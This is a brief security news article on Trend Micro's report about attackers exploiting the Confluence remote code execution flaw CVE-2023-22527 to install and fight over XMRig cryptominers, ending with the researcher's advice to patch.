Atlassian Confluence Data Center and Confluence Server previously had a high severity vulnerability that could allow remote attackers to execute malicious code.
Although the fix has been available for months, there are still many unprotected endpoints in circulation.
Hackers have been observed installing cryptocurrency miners on these devices, leading to sky-high electricity bills for victims and rendering their devices virtually unusable.
Fighting for control
That is according to a new report from cybersecurity researchers Trend Micro. The report, published earlier this week, states that scammers compete with each other and regularly remove and install cryptominers.
The vulnerability is tracked as CVE-2023-22527. It is a critical flaw with a severity of 10/10 that allows for remote code execution and was patched in mid-January of this year. However, since mid-June of this year, criminals have started scanning for vulnerable instances and removing the XMRig miner where possible. XMRig is the most popular crypto miner out there and generates the Monero (XMR) cryptocurrency. Monero is described as a privacy coin because it is virtually untraceable.
“The attacks are carried out by malicious actors using methods such as deploying shell scripts and XMRig miners, targeting SSH endpoints, disabling competing crypto mining processes, and enforcing persistence via cron jobs,” said Abdelrahman Esmail, a researcher at Trend Micro.
The section on “killing competing crypto mining processes” is particularly interesting. The researcher said that there are at least three different actors struggling to maintain control over these endpoints. Once they compromise the device, they use a shell script to kill previous miners, remove all existing cron jobs, remove cloud security tools, and collect system data. They then establish a channel with the C2 server and launch a new miner.
“With its continued exploitation by threat actors, CVE-2023-22527 poses a significant security risk to organizations worldwide,” the researcher added. “To minimize the risks and threats associated with this vulnerability, administrators should update their Confluence Data Center and Confluence Server versions to the latest available versions as soon as possible.”
Via The Hacker News